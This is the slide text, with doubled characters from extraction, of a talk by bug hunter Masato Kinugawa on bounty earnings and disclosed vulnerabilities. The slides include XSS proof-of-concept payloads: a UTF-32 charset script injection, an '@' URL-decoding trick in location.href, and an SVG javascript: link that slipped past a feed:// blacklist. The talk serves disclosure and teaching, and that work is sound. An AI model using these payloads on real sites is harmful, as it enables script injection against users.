Post on 06-Aug-2015
BBuugg--hhuunntteerr’’ss JJooyy
Masato Kinugawa
Name Masato Kinugawa Nationality Japanese(maybe)
Hobby Listening Music and XSS Profession BBuugg--hhuunntteerr
FFiirrsstt BBuugg--HHuunntteerr’’ss LLiiffee aanndd BBoouunnttyy PPrrooggrraamm
SSeeccoonndd DDeelliigghhttffuull BBuuggss
TThhiirrdd TThhee rreeaassoonnss wwhhyy II bbeeccaammee BBuugg--hhuunntteerr
BBuugg--hhuunntteerr’’ss LLiiffee aanndd BBoouunnttyy PPrrooggrraamm
Workplace Home Working Hours Any time I want
Work Finding Security Bugs Income BBuugg BBoouunnttyy
➡Does it make enough money to live?
2277113355334466 ((JJPPYY)) $$114422772233 (($$11 == 112200 JJPPYY))
2277113355334466 ((JJPPYY)) $$114422772233 (($$11 == 112200 JJPPYY)) ((iinn OOccttaall ddiiggiittss))
! GGooooggllee launched in 2010 ! Followed by MMaannyy CCoommppaanniieess
! GGooooggllee VVulnerability RReward PProgram ! 1 bug = $100~20,000
$$113300,,880033..77 TToottaall BBoouunnttiieess
NNuummbbeerr ooff bbuuggss rreeppoorrtteedd
112277((119911 including duplicated and/or not rewarded ones)
EEvveenn mmoorree mmoottiivvaatteedd bbyy tthhee iinnccrreeaasseedd bboouunnttyy rraatteess!! $
II aamm aaccttuuaallllyy nniigghhtt oowwll……
! QQuuiicckk RReeppoossee since the program is launched.
! CCoonnssiiddeerr NOT ONLY seriousness, but also tthhee lleevveell ooff ““iinntteerreessttiinngg””,, ooff tthhee bbuugg..
! Require only ssiimmppllee eexxppllaannaattiioonn ttoo hhaavvee tthheemm uunnddeerrssttaanndd tthhee pprroobblleemm..
! PPrroovviiddee ffuunn to the reporters.
! TThhee MMoosstt IImmppoorrttaanntt DDoommaaiinn ooff GGooooggllee ! Bounty was $$55,,000000 (Exceeds the regulated maximum
amount at that time)
https://accounts.google.com/example?oe=utf-‐‑‒32
HTTP/1.1 200 OK Alternate-‐‑‒Protocol: 443:quic,p=0.01 Cache-‐‑‒Control: private, max-‐‑‒age=0 Content-‐‑‒Encoding: gzip Content-‐‑‒Type: text/html; charset=UTF-‐‑‒32 ...
! Character Code can be set by URL ! UUTTFF--3322 was able to be set
∀㸀㸀㰀㰀script㸀㸀alert(1)㰀㰀/script㸀㸀�
➊➊ AArrrraayy ooff tthhee BByytteess
❷❷ CChhaarraacctteerr CCooddee ooff tthhee PPaaggee
❸❸ HHaannddlliinngg 00xx0000 CChhaarraacctteerrss
00 00 22 00 00 00 3E 00 00 00 3C 00 00 00 00 73 00 00 00 63 00 00 00 72 00 00 00 69 00 00 00 70 00 00 00 74 00 00 3E 00 00 00 00 61 00 00 00 6C 00 00 00 65 00 00 00 72 00 00 00 74 00 00 00 28 00 00 00 31 00 00 00 29 00 00 3C 00 00 00 00 2F 00 00 00 73 00 00 00 63 00 00 00 72 00 00 00 69 00 00 00 70 00 00 00 74 00 00 3E 00
∀㸀㸀㰀㰀�s c r�i p t�㸀㸀a l�e r t�( 1 )�㰀㰀/ s�c r i�p t 㸀㸀�
In UTF-32, 1 character requires 4 bytes
➊�
IE does not support UTF-‐‑‒32 ➡Character Code shall be “recognized” to be something
00 00 22 00 00 00 3E 00 00 00 3C 00 00 00 00 73 00 00 00 63 00 00 00 72 00 00 00 69 00 00 00 70 00 00 00 74 00 00 3E 00 00 00 00 61 00 00 00 6C 00 00 00 65 00 00 00 72 00 00 00 74 00 00 00 28 00 00 00 31 00 00 00 29 00 00 3C 00 00 00 00 2F 00 00 00 73 00 00 00 63 00 00 00 72 00 00 00 69 00 00 00 70 00 00 00 74 00 00 3E 00
∀㸀㸀㰀㰀�s c r�i p t�㸀㸀a l�e r t�( 1 )�㰀㰀/ s�c r i�p t 㸀㸀�
❷
This “super great” web site provides the support status of character codes, of all web browser http://l0.cm/encodings/table/
IE(<=9) ignores the characters ➡the “00” are uunnddeerrssttoooodd aass nnootthhiinngg..
00 00 22 00 00 00 3E 00 00 00 3C 00 00 00 00 73 00 00 00 63 00 00 00 72 00 00 00 69 00 00 00 70 00 00 00 74 00 00 3E 00 00 00 00 61 00 00 00 6C 00 00 00 65 00 00 00 72 00 00 00 74 00 00 00 28 00 00 00 31 00 00 00 29 00 00 3C 00 00 00 00 2F 00 00 00 73 00 00 00 63 00 00 00 72 00 00 00 69 00 00 00 70 00 00 00 74 00 00 3E 00
� > ��s c r�i p t�> a l�e r t�( 1 )�� / s�c r i�p t >�
❸
Message from the web page
Seek browser and plug-in bugs also ������1�������������1�������������1�������������1�������������1�������������1����1��������1��1����
������11������������1�������������1�������
������1��1����������1����1��������1���1���������1�������������11������
������11������������1����1��
������1�����1�������1�������������1�������������1����1��������1�������������1�������������1�������������1�������������1�������
! 2288..77%% of total number of bugs I reported ! TThhee 8877%% ooff tthheemm aarree wwiitthh IIEE
! Take longer to fix ! Even if it is fixed, it is NOT likely to applied to
the different IE version.
Something is required at the Web service level
Therefore
location.href is aa mmeetthhoodd ttoo ggeett tthhee UURRLL ooff tthhee ppaaggee by JavaScript
http://example.com/
http://example.com/
location.href
http://evil%2F@eexxaammppllee..ccoomm/ location.href is
http://eevviill/@example.com/ The URL part before @ is aauuttoommaattiiccaallllyy ddeeccooddeedd!! ➡IItt ggeenneerraatteess UURRLL ppooiinnttss ttoo eexxtteerrnnaall WWeebb ssiittee
AAllll ccooddeess iinncclluuddee llooccaattiioonn..hhrreeff ppooiinnttiinngg ttoo sseellff--ddoommaaiinn aarree ppootteennttiiaallllyy vvuullnneerraabbllee
Added characters before “@”, then checked any web pages if it send request to the external sites
Therefore
http://evil%2F@www.youtube.com/
! Found ffaattaall bbuugg, at same time ! Exist in feed:// URL that represents RSS ! Can extract unrelated feed to any domain
by ccuussttoommiizziinngg the part of URL before @. ! Put the scripts in the unrelated feeds,
XSS works on the extracted domain
WWee ccaann eennffoorrccee XXSSSS oonn aannyy wweebb ssiitteess \\((^̂oo^̂))// yyeeaahh☆☆
therefore
In feed:// URL, characters which can run scripts are restricted. (=Blacklist)
It is easy; jjuusstt ppaassssiinngg tthhrroouugghh tthhee bbllaacckklliisstt!
Things to do
<a href="javascript:alert(1)">XSS</a>
<a>XSS</a>
FFiinndd oouutt tthhee cchhaarraacctteerrss wwhhiicchh ccaann ppaassss tthhrroouugghh bbaasseedd oonn tthhee cchhaarraacctteerr rreemmoovvaall ppaatttteerrnn
BBeeeeppiinngg!!
<svg><a xmlns:xlink="http://www.w3.org/1999/xlink"xxlliinnkk::hhrreeff==""jjaavvaassccrriipptt::aalleerrtt((11))""><rect width="1000" height="1000" /></a></svg> SSiilleennccee……
feed://l0.cm%2Fcb.rss%3F@codeblue.jp/
feed://l0.cm%2Fcb.rss%3F@codeblue.jp/
alert('CODE BLUE、2回⽬目開催おめでとう!\n'+ document.domain+'から')
(Congratulation for the 2nd Code Blue)
! Web applications are in jeopardies caused by character codes, browser behaviors / bugs, and so on…
! Finding out mysteriously complicated bugs is tthhee uullttiimmaattee ddeelliigghhtt..
You want to see more? http://masatokinugawa.l0.cm/
! Grow up in touch of computers.
! Love to disassemble anything
! Debut as XSS “attacker” in the 6th grade
! Grow up with in touch of computers. ➡ I got to knew what is binary in 2009 ! Love to disassemble anything ➡ Donʼ’t love to do (so lot) ! Debut as XSS “attacker” in the 6th grade ➡ I got interested in security in 2009
Decided to ddoo wwhhaatt II wwaanntt,, iinn mmyy wwaayy
���������������������
~2009 A lot happened 2010 Left computer vocational school
What I want to do: Seeking vulnerabilities
FFoouunndd ssoo lloott!!
Soon after, GGooooggllee llaauunncchheedd bug bounty program
Spent all waking hours to find vulnerabilities.
Bug hunting house-‐‑‒husband? ➡ Need to gain girl hunt skill also ☺
! Extension of what I want to do ! Found my self as bug̶—hunter, one day
WWiisshh ffoorr ffuuttuurree……
! Must spent most of the time to repeating unsophisticated verification test
! No income unless find anything
! FFeeeelliinngg aaccccoommpplliisshhmmeenntt iiss ggrreeaatt, as what I achieved, directly become money
! NNootthhiinngg iinn tthhee wwoorrlldd ttoo ffeeeell ddeelliigghhtt like treasure hunting.
! Abnormal behaviors are mmuucchh ffuunn ttoo sseeee
However…
TThhee ffiinnddiinngg sskkiillll iiss aallll wwhhaatt yyoouu nneeeedd Can concentrate on to improving skill
CCaann ddoo bbyy yyoouurrsseellff Almost no human relationship issue
CCaann ddoo aatt yyoouurr hhoommee No commuting time
CCaann wwoorrkk aatt oowwnn ppaaccee Can do when you want
“Listen music” as a hobby “Bug-hunt” as a hobby (same as above)
““HHoobbbbyy””
Do anything you want! Then, you may find your own way.
FFoorr tthhoossee wwhhoo aarree ttrryyiinngg ttoo ffiinndd yyoouurr wwaayy......
UUnnddeerrssttoooodd??!!
Thank You!
@kinugawamasato
✉ masatokinugawa [at] gmail.com
Contact